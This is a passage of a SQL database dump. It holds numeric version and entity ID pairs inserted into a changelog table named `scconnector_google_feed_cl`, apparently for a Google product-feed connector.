(36388, 1919),
(36389, 1919),
(36390, 1919),
(36391, 1920),
(36392, 1920),
(36393, 1920),
(36394, 1920),
(36395, 1920),
(36396, 1920),
(36397, 1920),
(36398, 1921),
(36399, 1921),
(36400, 1921),
(36401, 1921),
(36402, 1921),
(36403, 1921),
(36404, 1921),
(36405, 1922),
(36406, 1922),
(36407, 1922),
(36408, 1922),
(36409, 1922),
(36410, 1922),
(36411, 1922),
(36412, 1923),
(36413, 1923),
(36414, 1923),
(36415, 1923),
(36416, 1923),
(36417, 1923),
(36418, 1923),
(36419, 1924),
(36420, 1924),
(36421, 1924),
(36422, 1924),
(36423, 1924),
(36424, 1924),
(36425, 1924),
(36426, 1925),
(36427, 1925),
(36428, 1925),
(36429, 1925),
(36430, 1925),
(36431, 1925),
(36432, 1925),
(36433, 1926),
(36434, 1926),
(36435, 1926),
(36436, 1926),
(36437, 1926),
(36438, 1926),
(36439, 1926),
(36440, 1927),
(36441, 1927),
(36442, 1927),
(36443, 1927),
(36444, 1927),
(36445, 1927),
(36446, 1927),
(36447, 1928),
(36448, 1928),
(36449, 1928),
(36450, 1928),
(36451, 1928),
(36452, 1928),
(36453, 1928),
(36454, 1929),
(36455, 1929),
(36456, 1929),
(36457, 1929),
(36458, 1929),
(36459, 1929),
(36460, 1929),
(36461, 1930),
(36462, 1930),
(36463, 1930),
(36464, 1930),
(36465, 1930),
(36466, 1930),
(36467, 1930),
(36468, 1931),
(36469, 1931),
(36470, 1931),
(36471, 1931),
(36472, 1931),
(36473, 1931),
(36474, 1931),
(36475, 1932),
(36476, 1932),
(36477, 1932),
(36478, 1932),
(36479, 1932),
(36480, 1932),
(36481, 1932),
(36482, 1932),
(36483, 1932),
(36484, 1932),
(36485, 1932),
(36486, 1933),
(36487, 1933),
(36488, 1933),
(36489, 1933),
(36490, 1933),
(36491, 1933),
(36492, 1933),
(36493, 1934),
(36494, 1934),
(36495, 1934),
(36496, 1934),
(36497, 1934),
(36498, 1934),
(36499, 1934),
(36500, 1935),
(36501, 1935),
(36502, 1935),
(36503, 1935),
(36504, 1935),
(36505, 1935),
(36506, 1935),
(36507, 1936),
(36508, 1936),
(36509, 1936),
(36510, 1936),
(36511, 1936),
(36512, 1936),
(36513, 1936),
(36514, 1937),
(36515, 1937),
(36516, 1937),
(36517, 1937),
(36518, 1937),
(36519, 1937),
(36520, 1937),
(36521, 1938),
(36522, 1938),
(36523, 1938),
(36524, 1938),
(36525, 1938),
(36526, 1938),
(36527, 1938),
(36528, 1939),
(36529, 1939),
(36530, 1939),
(36531, 1939),
(36532, 1939),
(36533, 1939),
(36534, 1939),
(36535, 1940),
(36536, 1940),
(36537, 1940),
(36538, 1940),
(36539, 1940),
(36540, 1940),
(36541, 1940),
(36542, 1941),
(36543, 1941),
(36544, 1941),
(36545, 1941),
(36546, 1941),
(36547, 1941),
(36548, 1941),
(36549, 1942),
(36550, 1942),
(36551, 1942),
(36552, 1942),
(36553, 1942),
(36554, 1942),
(36555, 1942),
(36556, 1943),
(36557, 1943),
(36558, 1943),
(36559, 1943),
(36560, 1943),
(36561, 1943),
(36562, 1943),
(36563, 1944),
(36564, 1944),
(36565, 1944),
(36566, 1944),
(36567, 1944),
(36568, 1944),
(36569, 1944),
(36570, 1945),
(36571, 1945),
(36572, 1945),
(36573, 1945),
(36574, 1945),
(36575, 1945),
(36576, 1945),
(36577, 1946),
(36578, 1946),
(36579, 1946),
(36580, 1946),
(36581, 1946),
(36582, 1946),
(36583, 1946),
(36584, 1947),
(36585, 1947),
(36586, 1947),
(36587, 1947),
(36588, 1947),
(36589, 1947),
(36590, 1947),
(36591, 1948),
(36592, 1948),
(36593, 1948),
(36594, 1948),
(36595, 1948),
(36596, 1948),
(36597, 1948),
(36598, 1948),
(36599, 1948),
(36600, 1948),
(36601, 1948),
(36602, 1949),
(36603, 1949),
(36604, 1949),
(36605, 1949),
(36606, 1949),
(36607, 1949),
(36608, 1949),
(36609, 1950),
(36610, 1950),
(36611, 1950),
(36612, 1950),
(36613, 1950),
(36614, 1950),
(36615, 1950),
(36616, 1951),
(36617, 1951),
(36618, 1951),
(36619, 1951),
(36620, 1951),
(36621, 1951),
(36622, 1951),
(36623, 1952),
(36624, 1952),
(36625, 1952),
(36626, 1952),
(36627, 1952),
(36628, 1952),
(36629, 1952),
(36630, 1953),
(36631, 1953),
(36632, 1953),
(36633, 1953),
(36634, 1953),
(36635, 1953),
(36636, 1953),
(36637, 1954),
(36638, 1954),
(36639, 1954),
(36640, 1954),
(36641, 1954),
(36642, 1954),
(36643, 1954),
(36644, 1955),
(36645, 1955),
(36646, 1955),
(36647, 1955),
(36648, 1955),
(36649, 1955),
(36650, 1955),
(36651, 1956),
(36652, 1956),
(36653, 1956),
(36654, 1956),
(36655, 1956),
(36656, 1956),
(36657, 1956),
(36658, 1957),
(36659, 1957),
(36660, 1957),
(36661, 1957),
(36662, 1957),
(36663, 1957),
(36664, 1957),
(36665, 1958),
(36666, 1958),
(36667, 1958),
(36668, 1958),
(36669, 1958),
(36670, 1958),
(36671, 1958),
(36672, 1959),
(36673, 1959),
(36674, 1959),
(36675, 1959),
(36676, 1959),
(36677, 1959),
(36678, 1959),
(36679, 1860),
(36680, 1861),
(36681, 1862),
(36682, 1863),
(36683, 1864),
(36684, 1865),
(36685, 1866),
(36686, 1867),
(36687, 1868),
(36688, 1869),
(36689, 1870),
(36690, 1871),
(36691, 1872),
(36692, 1873),
(36693, 1874),
(36694, 1875),
(36695, 1876),
(36696, 1877),
(36697, 1878),
(36698, 1879),
(36699, 1880),
(36700, 1881),
(36701, 1882),
(36702, 1883),
(36703, 1884),
(36704, 1885),
(36705, 1886),
(36706, 1887),
(36707, 1888),
(36708, 1889),
(36709, 1890),
(36710, 1891),
(36711, 1892),
(36712, 1893),
(36713, 1894),
(36714, 1895),
(36715, 1896),
(36716, 1897),
(36717, 1898),
(36718, 1899),
(36719, 1900),
(36720, 1901),
(36721, 1902),
(36722, 1903),
(36723, 1904),
(36724, 1905),
(36725, 1906),
(36726, 1907),
(36727, 1908),
(36728, 1909),
(36729, 1910),
(36730, 1911),
(36731, 1912),
(36732, 1913),
(36733, 1914),
(36734, 1915),
(36735, 1916),
(36736, 1917),
(36737, 1918),
(36738, 1919),
(36739, 1920),
(36740, 1921),
(36741, 1922),
(36742, 1923),
(36743, 1924),
(36744, 1925),
(36745, 1926),
(36746, 1927),
(36747, 1928),
(36748, 1929),
(36749, 1930),
(36750, 1931),
(36751, 1932),
(36752, 1933),
(36753, 1934),
(36754, 1935),
(36755, 1936),
(36756, 1937),
(36757, 1938),
(36758, 1939),
(36759, 1940),
(36760, 1941),
(36761, 1942),
(36762, 1943),
(36763, 1944),
(36764, 1945),
(36765, 1946),
(36766, 1947),
(36767, 1948),
(36768, 1949),
(36769, 1950),
(36770, 1951),
(36771, 1952),
(36772, 1953),
(36773, 1954),
(36774, 1955),
(36775, 1956),
(36776, 1957),
(36777, 1958),
(36778, 1959),
(36779, 1860),
(36780, 1860),
(36781, 1860),
(36782, 1860),
(36783, 1860),
(36784, 1860),
(36785, 1860),
(36786, 1860),
(36787, 1860),
(36788, 1861),
(36789, 1861),
(36790, 1861),
(36791, 1861),
(36792, 1861),
(36793, 1861),
(36794, 1862),
(36795, 1862),
(36796, 1862),
(36797, 1862),
(36798, 1862),
(36799, 1862),
(36800, 1863),
(36801, 1863),
(36802, 1863),
(36803, 1863),
(36804, 1863),
(36805, 1863),
(36806, 1864),
(36807, 1864),
(36808, 1864),
(36809, 1864),
(36810, 1864),
(36811, 1864),
(36812, 1865),
(36813, 1865),
(36814, 1865),
(36815, 1865),
(36816, 1865),
(36817, 1865),
(36818, 1866),
(36819, 1866),
(36820, 1866),
(36821, 1866),
(36822, 1866),
(36823, 1866),
(36824, 1867),
(36825, 1867),
(36826, 1867),
(36827, 1867),
(36828, 1867),
(36829, 1867),
(36830, 1867),
(36831, 1867),
(36832, 1867),
(36833, 1868),
(36834, 1868),
(36835, 1868),
(36836, 1868),
(36837, 1868),
(36838, 1868),
(36839, 1869),
(36840, 1869),
(36841, 1869),
(36842, 1869),
(36843, 1869),
(36844, 1869),
(36845, 1870),
(36846, 1870),
(36847, 1870),
(36848, 1870),
(36849, 1870),
(36850, 1870),
(36851, 1871),
(36852, 1871),
(36853, 1871),
(36854, 1871),
(36855, 1871),
(36856, 1871),
(36857, 1872),
(36858, 1872),
(36859, 1872),
(36860, 1872),
(36861, 1872),
(36862, 1872),
(36863, 1873),
(36864, 1873),
(36865, 1873),
(36866, 1873),
(36867, 1873),
(36868, 1873),
(36869, 1874),
(36870, 1874),
(36871, 1874),
(36872, 1874),
(36873, 1874),
(36874, 1874),
(36875, 1874),
(36876, 1874),
(36877, 1874),
(36878, 1875),
(36879, 1875),
(36880, 1875),
(36881, 1875),
(36882, 1875),
(36883, 1875),
(36884, 1876),
(36885, 1876),
(36886, 1876),
(36887, 1876),
(36888, 1876),
(36889, 1876),
(36890, 1877),
(36891, 1877),
(36892, 1877),
(36893, 1877),
(36894, 1877),
(36895, 1877),
(36896, 1878),
(36897, 1878),
(36898, 1878),
(36899, 1878),
(36900, 1878),
(36901, 1878),
(36902, 1879),
(36903, 1879),
(36904, 1879),
(36905, 1879),
(36906, 1879),
(36907, 1879),
(36908, 1880),
(36909, 1880),
(36910, 1880),
(36911, 1880),
(36912, 1880),
(36913, 1880),
(36914, 1881),
(36915, 1881),
(36916, 1881),
(36917, 1881),
(36918, 1881),
(36919, 1881),
(36920, 1881),
(36921, 1881),
(36922, 1881),
(36923, 1882),
(36924, 1882),
(36925, 1882),
(36926, 1882),
(36927, 1882),
(36928, 1882),
(36929, 1883),
(36930, 1883),
(36931, 1883),
(36932, 1883),
(36933, 1883),
(36934, 1883),
(36935, 1884),
(36936, 1884),
(36937, 1884),
(36938, 1884),
(36939, 1884),
(36940, 1884),
(36941, 1885),
(36942, 1885),
(36943, 1885),
(36944, 1885),
(36945, 1885),
(36946, 1885),
(36947, 1886),
(36948, 1886),
(36949, 1886),
(36950, 1886),
(36951, 1886),
(36952, 1886),
(36953, 1887),
(36954, 1887),
(36955, 1887),
(36956, 1887),
(36957, 1887),
(36958, 1887),
(36959, 1888),
(36960, 1888),
(36961, 1888),
(36962, 1888),
(36963, 1888),
(36964, 1888),
(36965, 1888),
(36966, 1888),
(36967, 1888),
(36968, 1889),
(36969, 1889),
(36970, 1889),
(36971, 1889),
(36972, 1889),
(36973, 1889),
(36974, 1890),
(36975, 1890),
(36976, 1890),
(36977, 1890),
(36978, 1890),
(36979, 1890),
(36980, 1891),
(36981, 1891),
(36982, 1891),
(36983, 1891),
(36984, 1891),
(36985, 1891),
(36986, 1892),
(36987, 1892),
(36988, 1892),
(36989, 1892),
(36990, 1892),
(36991, 1892),
(36992, 1893),
(36993, 1893),
(36994, 1893),
(36995, 1893),
(36996, 1893),
(36997, 1893),
(36998, 1894),
(36999, 1894),
(37000, 1894),
(37001, 1894),
(37002, 1894),
(37003, 1894),
(37004, 1895),
(37005, 1895),
(37006, 1895),
(37007, 1895),
(37008, 1895),
(37009, 1895),
(37010, 1895),
(37011, 1895),
(37012, 1895),
(37013, 1896),
(37014, 1896),
(37015, 1896),
(37016, 1896),
(37017, 1896),
(37018, 1896),
(37019, 1897),
(37020, 1897),
(37021, 1897),
(37022, 1897),
(37023, 1897),
(37024, 1897),
(37025, 1898),
(37026, 1898),
(37027, 1898),
(37028, 1898),
(37029, 1898),
(37030, 1898),
(37031, 1899),
(37032, 1899),
(37033, 1899),
(37034, 1899),
(37035, 1899),
(37036, 1899),
(37037, 1900),
(37038, 1900),
(37039, 1900),
(37040, 1900),
(37041, 1900),
(37042, 1900),
(37043, 1901),
(37044, 1901),
(37045, 1901),
(37046, 1901),
(37047, 1901),
(37048, 1901),
(37049, 1902),
(37050, 1902),
(37051, 1902),
(37052, 1902),
(37053, 1902),
(37054, 1902),
(37055, 1902),
(37056, 1902),
(37057, 1902),
(37058, 1903),
(37059, 1903),
(37060, 1903),
(37061, 1903),
(37062, 1903),
(37063, 1903),
(37064, 1904),
(37065, 1904),
(37066, 1904),
(37067, 1904),
(37068, 1904),
(37069, 1904),
(37070, 1905),
(37071, 1905),
(37072, 1905),
(37073, 1905),
(37074, 1905),
(37075, 1905),
(37076, 1906),
(37077, 1906),
(37078, 1906),
(37079, 1906),
(37080, 1906),
(37081, 1906),
(37082, 1907),
(37083, 1907),
(37084, 1907),
(37085, 1907),
(37086, 1907),
(37087, 1907),
(37088, 1908),
(37089, 1908),
(37090, 1908),
(37091, 1908),
(37092, 1908),
(37093, 1908),
(37094, 1909),
(37095, 1909),
(37096, 1909),
(37097, 1909),
(37098, 1909),
(37099, 1909),
(37100, 1909),
(37101, 1909),
(37102, 1909),
(37103, 1910),
(37104, 1910),
(37105, 1910),
(37106, 1910),
(37107, 1910),
(37108, 1910),
(37109, 1911),
(37110, 1911),
(37111, 1911),
(37112, 1911),
(37113, 1911),
(37114, 1911),
(37115, 1912),
(37116, 1912),
(37117, 1912),
(37118, 1912),
(37119, 1912),
(37120, 1912),
(37121, 1913),
(37122, 1913),
(37123, 1913),
(37124, 1913),
(37125, 1913),
(37126, 1913),
(37127, 1914),
(37128, 1914),
(37129, 1914),
(37130, 1914),
(37131, 1914),
(37132, 1914),
(37133, 1915),
(37134, 1915),
(37135, 1915),
(37136, 1915),
(37137, 1915),
(37138, 1915);
INSERT INTO `scconnector_google_feed_cl` (`version_id`, `entity_id`) VALUES
(37139, 1916),
(37140, 1916),
(37141, 1916),
(37142, 1916),
(37143, 1916),
(37144, 1916),
(37145, 1916),
(37146, 1916),
(37147, 1916),
(37148, 1917),
(37149, 1917),
(37150, 1917),
(37151, 1917),
(37152, 1917),
(37153, 1917),
(37154, 1918),
(37155, 1918),
(37156, 1918),
(37157, 1918),
(37158, 1918),
(37159, 1918),
(37160, 1919),
(37161, 1919),
(37162, 1919),
(37163, 1919),
(37164, 1919),
(37165, 1919),
(37166, 1920),
(37167, 1920),
(37168, 1920),
(37169, 1920),
(37170, 1920),
(37171, 1920),
(37172, 1921),
(37173, 1921),
(37174, 1921),
(37175, 1921),
(37176, 1921),
(37177, 1921),
(37178, 1922),
(37179, 1922),
(37180, 1922),
(37181, 1922),
(37182, 1922),
(37183, 1922),
(37184, 1923),
(37185, 1923),
(37186, 1923),
(37187, 1923),
(37188, 1923),
(37189, 1923),
(37190, 1924),
(37191, 1924),
(37192, 1924),
(37193, 1924),
(37194, 1924),
(37195, 1924),
(37196, 1925),
(37197, 1925),
(37198, 1925),
(37199, 1925),
(37200, 1925),
(37201, 1925),
(37202, 1926),
(37203, 1926),
(37204, 1926),
(37205, 1926),
(37206, 1926),
(37207, 1926),
(37208, 1927),
(37209, 1927),
(37210, 1927),
(37211, 1927),
(37212, 1927),
(37213, 1927),
(37214, 1928),
(37215, 1928),
(37216, 1928),
(37217, 1928),
(37218, 1928),
(37219, 1928),
(37220, 1929),
(37221, 1929),
(37222, 1929),
(37223, 1929),
(37224, 1929),
(37225, 1929),
(37226, 1930),
(37227, 1930),
(37228, 1930),
(37229, 1930),
(37230, 1930),
(37231, 1930),
(37232, 1931),
(37233, 1931),
(37234, 1931),
(37235, 1931),
(37236, 1931),
(37237, 1931),
(37238, 1932),
(37239, 1932),
(37240, 1932),
(37241, 1932),
(37242, 1932),
(37243, 1932),
(37244, 1932),
(37245, 1932),
(37246, 1932),
(37247, 1933),
(37248, 1933),
(37249, 1933),
(37250, 1933),
(37251, 1933),
(37252, 1933),
(37253, 1934),
(37254, 1934),
(37255, 1934),
(37256, 1934),
(37257, 1934),
(37258, 1934),
(37259, 1935),
(37260, 1935),
(37261, 1935),
(37262, 1935),
(37263, 1935),
(37264, 1935),
(37265, 1936),
(37266, 1936),
(37267, 1936),
(37268, 1936),
(37269, 1936),
(37270, 1936),
(37271, 1937),
(37272, 1937),
(37273, 1937),
(37274, 1937),
(37275, 1937),
(37276, 1937),
(37277, 1938),
(37278, 1938),
(37279, 1938),
(37280, 1938),
(37281, 1938),
(37282, 1938),
(37283, 1939),
(37284, 1939),
(37285, 1939),
(37286, 1939),
(37287, 1939),
(37288, 1939),
(37289, 1940),
(37290, 1940),
(37291, 1940),
(37292, 1940),
(37293, 1940),
(37294, 1940),
(37295, 1941),
(37296, 1941),
(37297, 1941),
(37298, 1941),
(37299, 1941),
(37300, 1941),
(37301, 1942),
(37302, 1942),
(37303, 1942),
(37304, 1942),
(37305, 1942),
(37306, 1942),
(37307, 1943),
(37308, 1943),
(37309, 1943),
(37310, 1943),
(37311, 1943),
(37312, 1943),
(37313, 1944),
(37314, 1944),
(37315, 1944),
(37316, 1944),
(37317, 1944),
(37318, 1944),
(37319, 1945),
(37320, 1945),
(37321, 1945),
(37322, 1945),
(37323, 1945),
(37324, 1945),
(37325, 1946),
(37326, 1946),
(37327, 1946),
(37328, 1946),
(37329, 1946),
(37330, 1946),
(37331, 1947),
(37332, 1947),
(37333, 1947),
(37334, 1947),
(37335, 1947),
(37336, 1947),
(37337, 1948),
(37338, 1948),
(37339, 1948),
(37340, 1948),
(37341, 1948),
(37342, 1948),
(37343, 1948),
(37344, 1948),
(37345, 1948),
(37346, 1949),
(37347, 1949),
(37348, 1949),
(37349, 1949),
(37350, 1949),
(37351, 1949),
(37352, 1950),
(37353, 1950),
(37354, 1950),
(37355, 1950),
(37356, 1950),
(37357, 1950),
(37358, 1951),
(37359, 1951),
(37360, 1951),
(37361, 1951),
(37362, 1951),
(37363, 1951),
(37364, 1952),
(37365, 1952),
(37366, 1952),
(37367, 1952),
(37368, 1952),
(37369, 1952),
(37370, 1953),
(37371, 1953),
(37372, 1953),
(37373, 1953),
(37374, 1953),
(37375, 1953),
(37376, 1954),
(37377, 1954),
(37378, 1954),
(37379, 1954),
(37380, 1954),
(37381, 1954),
(37382, 1955),
(37383, 1955),
(37384, 1955),
(37385, 1955),
(37386, 1955),
(37387, 1955),
(37388, 1956),
(37389, 1956),
(37390, 1956),
(37391, 1956),
(37392, 1956),
(37393, 1956),
(37394, 1957),
(37395, 1957),
(37396, 1957),
(37397, 1957),
(37398, 1957),
(37399, 1957),
(37400, 1958),
(37401, 1958),
(37402, 1958),
(37403, 1958),
(37404, 1958),
(37405, 1958),
(37406, 1959),
(37407, 1959),
(37408, 1959),
(37409, 1959),
(37410, 1959),
(37411, 1959),
(37412, 1860),
(37413, 1861),
(37414, 1861),
(37415, 1862),
(37416, 1862),
(37417, 1863),
(37418, 1863),
(37419, 1864),
(37420, 1864),
(37421, 1865),
(37422, 1865),
(37423, 1866),
(37424, 1866),
(37425, 1867),
(37426, 1868),
(37427, 1868),
(37428, 1869),
(37429, 1869),
(37430, 1870),
(37431, 1870),
(37432, 1871),
(37433, 1871),
(37434, 1872),
(37435, 1872),
(37436, 1873),
(37437, 1873),
(37438, 1874),
(37439, 1875),
(37440, 1875),
(37441, 1876),
(37442, 1876),
(37443, 1877),
(37444, 1877),
(37445, 1878),
(37446, 1878),
(37447, 1879),
(37448, 1879),
(37449, 1880),
(37450, 1880),
(37451, 1881),
(37452, 1882),
(37453, 1882),
(37454, 1883),
(37455, 1883),
(37456, 1884),
(37457, 1884),
(37458, 1885),
(37459, 1885),
(37460, 1886),
(37461, 1886),
(37462, 1887),
(37463, 1887),
(37464, 1888),
(37465, 1889),
(37466, 1889),
(37467, 1890),
(37468, 1890),
(37469, 1891),
(37470, 1891),
(37471, 1892),
(37472, 1892),
(37473, 1893),
(37474, 1893),
(37475, 1894),
(37476, 1894),
(37477, 1895),
(37478, 1896),
(37479, 1896),
(37480, 1897),
(37481, 1897),
(37482, 1898),
(37483, 1898),
(37484, 1899),
(37485, 1899),
(37486, 1900),
(37487, 1900),
(37488, 1901),
(37489, 1901),
(37490, 1902),
(37491, 1903),
(37492, 1903),
(37493, 1904),
(37494, 1904),
(37495, 1905),
(37496, 1905),
(37497, 1906),
(37498, 1906),
(37499, 1907),
(37500, 1907),
(37501, 1908),
(37502, 1908),
(37503, 1909),
(37504, 1910),
(37505, 1910),
(37506, 1911),
(37507, 1911),
(37508, 1912),
(37509, 1912),
(37510, 1913),
(37511, 1913),
(37512, 1914),
(37513, 1914),
(37514, 1915),
(37515, 1915),
(37516, 1916),
(37517, 1917),
(37518, 1917),
(37519, 1918),
(37520, 1918),
(37521, 1919),
(37522, 1919),
(37523, 1920),
(37524, 1920),
(37525, 1921),
(37526, 1921),
(37527, 1922),
(37528, 1922),
(37529, 1923),
(37530, 1923),
(37531, 1924),
(37532, 1924),
(37533, 1925),
(37534, 1925),
(37535, 1926),
(37536, 1926),
(37537, 1927),
(37538, 1927),
(37539, 1928),
(37540, 1928),
(37541, 1929),
(37542, 1929),
(37543, 1930),
(37544, 1930),
(37545, 1931),
(37546, 1931),
(37547, 1932),
(37548, 1933),
(37549, 1933),
(37550, 1934),
(37551, 1934),
(37552, 1935),
(37553, 1935),
(37554, 1936),
(37555, 1936),
(37556, 1937),
(37557, 1937),
(37558, 1938),
(37559, 1938),
(37560, 1939),
(37561, 1939),
(37562, 1940),
(37563, 1940),
(37564, 1941),
(37565, 1941),
(37566, 1942),
(37567, 1942),
(37568, 1943),
(37569, 1943),
(37570, 1944),
(37571, 1944),
(37572, 1945),
(37573, 1945),
(37574, 1946),
(37575, 1946),
(37576, 1947),
(37577, 1947),
(37578, 1948),
(37579, 1949),
(37580, 1949),
(37581, 1950),
(37582, 1950),
(37583, 1951),
(37584, 1951),
(37585, 1952),
(37586, 1952),
(37587, 1953),
(37588, 1953),
(37589, 1954),
(37590, 1954),
(37591, 1955),
(37592, 1955),
(37593, 1956),
(37594, 1956),
(37595, 1957),
(37596, 1957),
(37597, 1958),
(37598, 1958),
(37599, 1959),
(37600, 1959),
(37601, 1960),
(37602, 1961),
(37603, 1962),
(37604, 1963),
(37605, 1964),
(37606, 1965),
(37607, 1966),
(37608, 1967),
(37609, 1968),
(37610, 1969),
(37611, 1970),
(37612, 1971),
(37613, 1972),
(37614, 1973),
(37615, 1974),
(37616, 1975),
(37617, 1976),
(37618, 1977),
(37619, 1978),
(37620, 1979),
(37621, 1980),
(37622, 1981),
(37623, 1982),
(37624, 1983),
(37625, 1984),
(37626, 1985),
(37627, 1986),
(37628, 1987),
(37629, 1988),
(37630, 1989),
(37631, 1990),
(37632, 1991),
(37633, 1992),
(37634, 1993),
(37635, 1994),
(37636, 1995),
(37637, 1996),
(37638, 1997),
(37639, 1998),
(37640, 1999),
(37641, 2000),
(37642, 2001),
(37643, 2002),
(37644, 2003),
(37645, 2004),
(37646, 2005),
(37647, 2006),
(37648, 2007),
(37649, 2008),
(37650, 2009),
(37651, 2010),
(37652, 2011),
(37653, 2012),
(37654, 2013),
(37655, 2014),
(37656, 2015),
(37657, 2016),
(37658, 2017),
(37659, 2018),
(37660, 2019),
(37661, 2020),
(37662, 2021),
(37663, 2022),
(37664, 2023),
(37665, 2024),
(37666, 2025),
(37667, 2026),
(37668, 2027),
(37669, 2028),
(37670, 2029),
(37671, 2030),
(37672, 2031),
(37673, 2032),
(37674, 2033),
(37675, 2034),
(37676, 2035),
(37677, 2036),
(37678, 2037),
(37679, 2038),
(37680, 2039),
(37681, 2040),
(37682, 2041),
(37683, 2042),
(37684, 2043),
(37685, 2044),
(37686, 2045),
(37687, 2046),
(37688, 2047),
(37689, 2048),
(37690, 2049),
(37691, 2050),
(37692, 2051),
(37693, 2052),
(37694, 2053),
(37695, 1960),
(37696, 1961),
(37697, 1962),
(37698, 1962),
(37699, 1962),
(37700, 1963),
(37701, 1964),
(37702, 1964),
(37703, 1964),
(37704, 1965),
(37705, 1965),
(37706, 1965),
(37707, 1966),
(37708, 1967),
(37709, 1968),
(37710, 1968),
(37711, 1968),
(37712, 1969),
(37713, 1970),
(37714, 1971),
(37715, 1971),
(37716, 1971),
(37717, 1972),
(37718, 1973),
(37719, 1974),
(37720, 1974),
(37721, 1974),
(37722, 1975),
(37723, 1976),
(37724, 1977),
(37725, 1977),
(37726, 1977),
(37727, 1978),
(37728, 1979),
(37729, 1980),
(37730, 1980),
(37731, 1980),
(37732, 1981),
(37733, 1981),
(37734, 1982),
(37735, 1983),
(37736, 1984),
(37737, 1984),
(37738, 1985),
(37739, 1986),
(37740, 1987),
(37741, 1987),
(37742, 1988),
(37743, 1989),
(37744, 1990),
(37745, 1990),
(37746, 1991),
(37747, 1992),
(37748, 1993),
(37749, 1993),
(37750, 1994),
(37751, 1995),
(37752, 1996),
(37753, 1996),
(37754, 1997),
(37755, 1997),
(37756, 1997),
(37757, 1998),
(37758, 1999),
(37759, 2000),
(37760, 2000),
(37761, 2000),
(37762, 2001),
(37763, 2002),
(37764, 2003),
(37765, 2003),
(37766, 2003),
(37767, 2004),
(37768, 2004),
(37769, 2005),
(37770, 2006),
(37771, 2007),
(37772, 2007),
(37773, 2008),
(37774, 2009),
(37775, 2010),
(37776, 2010),
(37777, 2011),
(37778, 2011),
(37779, 2012),
(37780, 2012),
(37781, 2013),
(37782, 2013),
(37783, 2014),
(37784, 2014),
(37785, 2015),
(37786, 2015),
(37787, 2016),
(37788, 2016),
(37789, 2017),
(37790, 2017),
(37791, 2017),
(37792, 2018),
(37793, 2019),
(37794, 2020),
(37795, 2020),
(37796, 2020),
(37797, 2021),
(37798, 2022),
(37799, 2023),
(37800, 2023),
(37801, 2023),
(37802, 2024),
(37803, 2024),
(37804, 2024),
(37805, 2025),
(37806, 2026),
(37807, 2027),
(37808, 2027),
(37809, 2027),
(37810, 2028),
(37811, 2029),
(37812, 2030),
(37813, 2030),
(37814, 2030),
(37815, 2031),
(37816, 2031),
(37817, 2032),
(37818, 2033),
(37819, 2034),
(37820, 2034),
(37821, 2035),
(37822, 2036),
(37823, 2037),
(37824, 2037),
(37825, 2038),
(37826, 2038),
(37827, 2038),
(37828, 2039),
(37829, 2040),
(37830, 2041),
(37831, 2041),
(37832, 2041),
(37833, 2042),
(37834, 2043),
(37835, 2044),
(37836, 2044),
(37837, 2044),
(37838, 2045),
(37839, 2046),
(37840, 2047),
(37841, 2047),
(37842, 2047),
(37843, 2048),
(37844, 2049),
(37845, 2050),
(37846, 2050),
(37847, 2050),
(37848, 2051),
(37849, 2052),
(37850, 2053),
(37851, 2053),
(37852, 2053),
(37853, 1960),
(37854, 1960),
(37855, 1960),
(37856, 1960),
(37857, 1960),
(37858, 1960),
(37859, 1960),
(37860, 1961),
(37861, 1961),
(37862, 1961),
(37863, 1961),
(37864, 1961),
(37865, 1961),
(37866, 1961),
(37867, 1962),
(37868, 1962),
(37869, 1962),
(37870, 1962),
(37871, 1962),
(37872, 1962),
(37873, 1962),
(37874, 1963),
(37875, 1963),
(37876, 1963),
(37877, 1963),
(37878, 1963),
(37879, 1963),
(37880, 1963),
(37881, 1964),
(37882, 1964),
(37883, 1964),
(37884, 1964),
(37885, 1964),
(37886, 1964),
(37887, 1964),
(37888, 1964),
(37889, 1964),
(37890, 1964),
(37891, 1964),
(37892, 1965),
(37893, 1965),
(37894, 1965),
(37895, 1965),
(37896, 1965),
(37897, 1965),
(37898, 1965),
(37899, 1966),
(37900, 1966),
(37901, 1966),
(37902, 1966),
(37903, 1966),
(37904, 1966),
(37905, 1966),
(37906, 1967),
(37907, 1967),
(37908, 1967),
(37909, 1967),
(37910, 1967),
(37911, 1967),
(37912, 1967),
(37913, 1968),
(37914, 1968),
(37915, 1968),
(37916, 1968),
(37917, 1968),
(37918, 1968),
(37919, 1968),
(37920, 1969),
(37921, 1969),
(37922, 1969),
(37923, 1969),
(37924, 1969),
(37925, 1969),
(37926, 1969),
(37927, 1970),
(37928, 1970),
(37929, 1970),
(37930, 1970),
(37931, 1970),
(37932, 1970),
(37933, 1970),
(37934, 1971),
(37935, 1971),
(37936, 1971),
(37937, 1971),
(37938, 1971),
(37939, 1971),
(37940, 1971),
(37941, 1972),
(37942, 1972),
(37943, 1972),
(37944, 1972),
(37945, 1972),
(37946, 1972),
(37947, 1972),
(37948, 1973),
(37949, 1973),
(37950, 1973),
(37951, 1973),
(37952, 1973),
(37953, 1973),
(37954, 1973),
(37955, 1974),
(37956, 1974),
(37957, 1974),
(37958, 1974),
(37959, 1974),
(37960, 1974),
(37961, 1974),
(37962, 1975),
(37963, 1975),
(37964, 1975),
(37965, 1975),
(37966, 1975),
(37967, 1975),
(37968, 1975),
(37969, 1976),
(37970, 1976),
(37971, 1976),
(37972, 1976),
(37973, 1976),
(37974, 1976),
(37975, 1976),
(37976, 1977),
(37977, 1977),
(37978, 1977),
(37979, 1977),
(37980, 1977),
(37981, 1977),
(37982, 1977),
(37983, 1978),
(37984, 1978),
(37985, 1978),
(37986, 1978),
(37987, 1978),
(37988, 1978),
(37989, 1978),
(37990, 1979),
(37991, 1979),
(37992, 1979),
(37993, 1979),
(37994, 1979),
(37995, 1979),
(37996, 1979),
(37997, 1980),
(37998, 1980),
(37999, 1980),
(38000, 1980),
(38001, 1980),
(38002, 1980),
(38003, 1980),
(38004, 1980),
(38005, 1980),
(38006, 1980),
(38007, 1980),
(38008, 1981),
(38009, 1981),
(38010, 1981),
(38011, 1981),
(38012, 1981),
(38013, 1981),
(38014, 1981),
(38015, 1982),
(38016, 1982),
(38017, 1982),
(38018, 1982),
(38019, 1982),
(38020, 1982),
(38021, 1982),
(38022, 1983),
(38023, 1983),
(38024, 1983),
(38025, 1983),
(38026, 1983),
(38027, 1983),
(38028, 1983),
(38029, 1984),
(38030, 1984),
(38031, 1984),
(38032, 1984),
(38033, 1984),
(38034, 1984),
(38035, 1984),
(38036, 1985),
(38037, 1985),
(38038, 1985),
(38039, 1985),
(38040, 1985),
(38041, 1985),
(38042, 1985),
(38043, 1986),
(38044, 1986),
(38045, 1986),
(38046, 1986),
(38047, 1986),
(38048, 1986),
(38049, 1986),
